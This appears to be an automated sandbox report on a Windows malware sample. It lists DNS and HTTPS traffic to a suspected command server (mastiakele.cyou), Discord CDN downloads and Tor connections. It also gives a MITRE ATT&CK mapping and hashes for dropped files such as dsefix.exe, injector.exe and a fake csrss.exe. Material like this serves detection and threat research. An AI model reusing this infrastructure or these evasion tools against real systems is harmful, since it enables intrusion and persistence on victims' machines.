vsblobprodscussu5shard58.blob.core.windows.net

patch.exe

Remote address:

8.8.8.8:53

Request

vsblobprodscussu5shard58.blob.core.windows.net

IN A

Response

vsblobprodscussu5shard58.blob.core.windows.net

IN CNAME

blob.sat09prdstr04a.store.core.windows.net

blob.sat09prdstr04a.store.core.windows.net

IN A

20.150.38.4
GET

https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee

patch.exe

Remote address:

20.150.38.4:443

Request

GET /b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard58.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Content-Length: 404480
Content-Type: application/octet-stream
Content-Language: x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee
Content-MD5: XaOoge+ZHoAQ3u15nxparw==
Last-Modified: Thu, 15 Jun 2017 19:58:38 GMT
Accept-Ranges: bytes
ETag: "0x8D4B428EA2D0250"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70480b25-501e-0030-2299-948c65000000
x-ms-version: 2019-07-07
x-ms-creation-time: Thu, 04 May 2017 19:05:36 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 01 Jun 2023 15:00:42 GMT
GET

https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee

patch.exe

Remote address:

20.150.38.4:443

Request

GET /b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard58.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Content-Length: 404480
Content-Type: application/octet-stream
Content-Language: x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee
Content-MD5: XaOoge+ZHoAQ3u15nxparw==
Last-Modified: Thu, 15 Jun 2017 19:58:38 GMT
Accept-Ranges: bytes
ETag: "0x8D4B428EA2D0250"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70481081-501e-0030-4499-948c65000000
x-ms-version: 2019-07-07
x-ms-creation-time: Thu, 04 May 2017 19:05:36 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 01 Jun 2023 15:00:43 GMT
DNS

server5.mastiakele.cyou

csrss.exe

Remote address:

8.8.8.8:53

Request

server5.mastiakele.cyou

IN A

Response
DNS

cdn.discordapp.com

csrss.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233
DNS

stun1.l.google.com

csrss.exe

Remote address:

8.8.8.8:53

Request

stun1.l.google.com

IN A

Response

stun1.l.google.com

IN A

172.253.121.127

204.79.197.219:443

https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

tls, http

patch.exe

3.3kB
13.6kB
19
27

HTTP Request

GET https://msdl.microsoft.com/download/symbols/index2.txt

HTTP Response

404

HTTP Request

GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

HTTP Response

302

HTTP Request

GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

HTTP Response

302

HTTP Request

GET https://msdl.microsoft.com/download/symbols/index2.txt

HTTP Response

404

HTTP Request

GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

HTTP Response

302

HTTP Request

GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

HTTP Response

302
20.209.34.36:443

https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3

tls, http

patch.exe

541.1kB
19.0MB
9099
13697

HTTP Request

GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3

HTTP Response

200

HTTP Request

GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=5Bn6sdhOw9i1mEomoKFC1cEDK033yojrr3GwsqbzUdw%3D&spr=https&se=2023-06-02T15%3A19%3A29Z&rscl=x-e2eid-11868a05-bd1f40ce-aacf72a0-a033a958-session-09d30830-a2374295-8c565417-24b6b7a3

HTTP Response

200
20.150.38.4:443

https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee

tls, http

patch.exe

16.5kB
847.2kB
325
609

HTTP Request

GET https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee

HTTP Response

200

HTTP Request

GET https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=mP1P870F1bFvDXTdQ1lLHbMWjuWkDtz03XUTIoupXnc%3D&spr=https&se=2023-06-02T15%3A35%3A46Z&rscl=x-e2eid-8f36c41f-71c4465b-932a9d7b-da71f439-session-d3879be2-87834bc5-9d3ff283-95e76bee

HTTP Response

200
162.159.130.233:443

cdn.discordapp.com

tls

csrss.exe

142.1kB
7.0MB
2901
5209
127.0.0.1:49303

tor.exe
158.101.203.38:9001

www.7qehnghllyxijm.com

tls

tor.exe

39.1kB
728.9kB
295
540
88.99.145.25:9993

www.hk6hvee3cavyakbqau2d6kt.com

tls

tor.exe

162.9kB
2.0MB
824
1474
185.241.208.179:443

www.fbhwhymzxkauqvu5mu2g.com

tls

tor.exe

327.6kB
3.8MB
1584
2831
173.232.194.19:8443

www.kengtdmwdk244m3zl.com

tls

tor.exe

282.8kB
3.4MB
1398
2495
88.99.145.25:9993

www.43dk62qk6psy7xd.com

tls

tor.exe

13.6kB
24.5kB
39
58
185.241.208.179:443

www.3s3ys4cb2ji6f.com

tls

tor.exe

6.0kB
16.6kB
23
35

8.8.8.8:53

bfd336f9-5fca-4b3c-b3eb-97a36d52a698.uuid.mastiakele.cyou

dns

csrss.exe

103 B
168 B
1
1

DNS Request

bfd336f9-5fca-4b3c-b3eb-97a36d52a698.uuid.mastiakele.cyou
8.8.8.8:53

msdl.microsoft.com

dns

patch.exe

64 B
182 B
1
1

DNS Request

msdl.microsoft.com

DNS Response

204.79.197.219
8.8.8.8:53

vsblobprodscussu5shard30.blob.core.windows.net

dns

patch.exe

92 B
148 B
1
1

DNS Request

vsblobprodscussu5shard30.blob.core.windows.net

DNS Response

20.209.34.36
8.8.8.8:53

vsblobprodscussu5shard58.blob.core.windows.net

dns

patch.exe

92 B
148 B
1
1

DNS Request

vsblobprodscussu5shard58.blob.core.windows.net

DNS Response

20.150.38.4
8.8.8.8:53

server5.mastiakele.cyou

dns

csrss.exe

69 B
134 B
1
1

DNS Request

server5.mastiakele.cyou
8.8.8.8:53

cdn.discordapp.com

dns

csrss.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.134.233

162.159.133.233

162.159.135.233

162.159.129.233
8.8.8.8:53

stun1.l.google.com

dns

csrss.exe

64 B
80 B
1
1

DNS Request

stun1.l.google.com

DNS Response

172.253.121.127
172.253.121.127:19302

stun1.l.google.com

csrss.exe

96 B
120 B
2
2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
395KB

MD5
5da3a881ef991e8010deed799f1a5aaf

SHA1
fea1acea7ed96d7c9788783781e90a2ea48c1a53

SHA256
f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

SHA512
24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-certs.tmp

Filesize
20KB

MD5
c0b3f165fe0a3bca84b39a1096ecffbd

SHA1
5999a03e19e8d13a9726398eb58dcab93fe0d3fe

SHA256
d45f58e47603bc9ee7636215ac84835fa06d255f2882e7058df0652e76450fbf

SHA512
fcb3a86e8d88b6959faffb1409716794c58aa80a59f217a8c5baaa5ac80f39c85368c7028c1c49de0c35c66f275a8ec28efbc532657fbd78c8031750b8b7cb33

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp

Filesize
2.3MB

MD5
36e2ef87ac2110573ca79d6ddde8edf2

SHA1
71c3e94fb8f27f68c794a2f3b504ddcbaf9ea64f

SHA256
cb599aa8e920db3f3167489ddfdb2a70caf80e428f8b67a422991719780e16c7

SHA512
b6aa669cfc700a6d417faedbb01f84c4d8626fa3b434281b5c6ead8c4948c4c8bcd100c9c240b11ae43b32d5fed424e09d8b74656b1ef5c18a4c97d51dc82c39

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdescs.new

Filesize
7.0MB

MD5
6b228563f0d49ff837c21e50e4c340d6

SHA1
a6d74f04b2a744feb0bbe9f66135e8474a69a8a8

SHA256
15db98503014730a6385c7d717b0abb1d2d88b5d379c58dcec4767d62bfd72ff

SHA512
94d38bcba55e130dce0da4808f17510ba432911512a7dd1537f2f78f1e9e3d361d70a912cca61a811c412fe75f139b73a909cbc161177fd481c24f0ece71a889

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\geoip

Filesize
3.8MB

MD5
c72911dec6ae8c4bc62bb2a6a21ba85b

SHA1
0ae7077313a53103c2b32100d74aafc04216289d

SHA256
7e777efc194ea9788171636085b19875d19397d3249fbb88136534037a3dc38f

SHA512
99dc9761ad69f5508d96a2362b930728d451f5ddcf7bb1e210ec5b0f14ee00ee71efaaab150ffa16a2f92fbbb1e2a6b5cd92d51721996df7ac794491c441c304

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\geoip6

Filesize
5.6MB

MD5
ed2f9b19dd1584d7e26f5ba460ef2fbf

SHA1
dcbf1789bf1eeb03276b830cb2ab92bcf779d97f

SHA256
f11bd1d7546cad00b6db0a1594f3ac1daf9f541004fd7efb5414e068693d6add

SHA512
dcfc780d1e34968390969b64ea2091b630c8eec94ac4724a4103a003a2f31545c3791a39f514517153538b4d3f5c50b6bfba74cc9cf8c0b1b5daba0a4849c856

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll

Filesize
3.5MB

MD5
b7c32c8e7d21aa9b79470037227eba43

SHA1
38d719b10ca035cee65162c1a44e2c62123d41b4

SHA256
99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23

SHA512
d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

Filesize
876KB

MD5
736443b08b5a52b6958f001e8200be71

SHA1
e56ddc8476aef0d3482c99c5bfaf0f57458b2576

SHA256
da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4

SHA512
9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll

Filesize
668KB

MD5
36e1c3814bde3418ba3d38517954cb7c

SHA1
495e1ba5b0b442e70124d33daa6fea4e3e5931b0

SHA256
b34edd252f46dd881e79cfd274777fe5e90943d511c8e002aeca0528d7f3b4b1

SHA512
df7b608c51a782ad5cdfd753577a3dcacf4e2515ac02ce9e35b3cbc543895862844e8adcaff983b1348884085cf7427c33a67acc5ce48fe656f5b2083d0813b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll

Filesize
938KB

MD5
d92e59b71bf8a0d827597ed95b2eca42

SHA1
cfc49ff29eddb7127fbed166a8a1e740ea3dfb9a

SHA256
b6ef5cb4c093431f3e73c53e66df33d08237ba46d457d119a2c4dcae582314e3

SHA512
be65e003a498e753b08912d697e9b4d8a28828581c17d1e8e20880372a81030ce18610eeff230c8880e68a831041075bb2ebffcf318d29ebf58bc856fac3df04

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll

Filesize
95KB

MD5
7cdbaca31739500aefc06dd85a8558ff

SHA1
adc36ec6a3cdc7e57a1b706c820e382627f6cb90

SHA256
0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb

SHA512
6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll

Filesize
301KB

MD5
07f4bbf18077231cb44750684dd8daf4

SHA1
8560627e9e05d6022abdfe7e576856e91ac90188

SHA256
4a146671b1fed4906799cb1cfc670753f1b1922793f5b40d5cf710befb287316

SHA512
04e31ad60e797cdbd1f3db36a8473139bbd1b763d2d67a160454b24b524e8bbc4d5784c62446a0f9d83b95dd518534ab4581d3a43a14146b17d0035ecc79c151

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

Filesize
4.3MB

MD5
055ae7c584a7b012955bf5d874f30cfa

SHA1
f2b4d8c5307ff09607be929ec08fc2727bf03dcf

SHA256
d51b5bf807f6de3b5521b49b9a722592fb85aee1ea2f1c03bbb5255d62bfb9c8

SHA512
910bb0be7a3840bb37cb453ea066677a5327e272cfa0995f7a600bd4eb2e7c31685dcc0758c3b2cf07c7622fd45b2d4cdd3a4272cddaf9e97e2ffc48120646c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll

Filesize
135KB

MD5
f08b1f044c68770c190daf1eb1f3157e

SHA1
f94103a542459d60434f9ddb6b5f45b11eae2923

SHA256
1d0278386f8922bdf4808861e6e901541ad23cc6337bb022c78dc05915202f27

SHA512
0667416a7515cd845e96d2ad26ca676cffd2d1c9f0449ff05455e8cf6a7ab595d3f972785d051f45332c04f1c0b576726f645e3669122608a4f374e984ba161c

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc

Filesize
227B

MD5
17c2994d6a89cb7d277f1b3f0b49e5ed

SHA1
2a72ffc34cb2a7d7d3057f4725f2ac660a809158

SHA256
38ad4c6fb403fc2d5dc0dc83a165983a3fb426e0a850847fefc35e62a5ced67f

SHA512
d145ea667f70ed08b12d44228aea09cab637dd1acee131b919f22efdd4730b0c18daa0c83b196f5efa2082cf8f90bcd618b7c7efaab79ca5f0478ade0aca4728

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
f5044df58ed68f39007184ad674f22c6

SHA1
0dedbe5e10878f737990cae5c407d67df98680f6

SHA256
15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

SHA512
bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
f5044df58ed68f39007184ad674f22c6

SHA1
0dedbe5e10878f737990cae5c407d67df98680f6

SHA256
15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

SHA512
bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
f5044df58ed68f39007184ad674f22c6

SHA1
0dedbe5e10878f737990cae5c407d67df98680f6

SHA256
15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

SHA512
bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll

Filesize
3.5MB

MD5
b7c32c8e7d21aa9b79470037227eba43

SHA1
38d719b10ca035cee65162c1a44e2c62123d41b4

SHA256
99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23

SHA512
d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

Filesize
876KB

MD5
736443b08b5a52b6958f001e8200be71

SHA1
e56ddc8476aef0d3482c99c5bfaf0f57458b2576

SHA256
da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4

SHA512
9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll

Filesize
668KB

MD5
36e1c3814bde3418ba3d38517954cb7c

SHA1
495e1ba5b0b442e70124d33daa6fea4e3e5931b0

SHA256
b34edd252f46dd881e79cfd274777fe5e90943d511c8e002aeca0528d7f3b4b1

SHA512
df7b608c51a782ad5cdfd753577a3dcacf4e2515ac02ce9e35b3cbc543895862844e8adcaff983b1348884085cf7427c33a67acc5ce48fe656f5b2083d0813b0

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll

Filesize
938KB

MD5
d92e59b71bf8a0d827597ed95b2eca42

SHA1
cfc49ff29eddb7127fbed166a8a1e740ea3dfb9a

SHA256
b6ef5cb4c093431f3e73c53e66df33d08237ba46d457d119a2c4dcae582314e3

SHA512
be65e003a498e753b08912d697e9b4d8a28828581c17d1e8e20880372a81030ce18610eeff230c8880e68a831041075bb2ebffcf318d29ebf58bc856fac3df04

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll

Filesize
95KB

MD5
7cdbaca31739500aefc06dd85a8558ff

SHA1
adc36ec6a3cdc7e57a1b706c820e382627f6cb90

SHA256
0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb

SHA512
6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll

Filesize
301KB

MD5
07f4bbf18077231cb44750684dd8daf4

SHA1
8560627e9e05d6022abdfe7e576856e91ac90188

SHA256
4a146671b1fed4906799cb1cfc670753f1b1922793f5b40d5cf710befb287316

SHA512
04e31ad60e797cdbd1f3db36a8473139bbd1b763d2d67a160454b24b524e8bbc4d5784c62446a0f9d83b95dd518534ab4581d3a43a14146b17d0035ecc79c151

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll

Filesize
135KB

MD5
f08b1f044c68770c190daf1eb1f3157e

SHA1
f94103a542459d60434f9ddb6b5f45b11eae2923

SHA256
1d0278386f8922bdf4808861e6e901541ad23cc6337bb022c78dc05915202f27

SHA512
0667416a7515cd845e96d2ad26ca676cffd2d1c9f0449ff05455e8cf6a7ab595d3f972785d051f45332c04f1c0b576726f645e3669122608a4f374e984ba161c

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
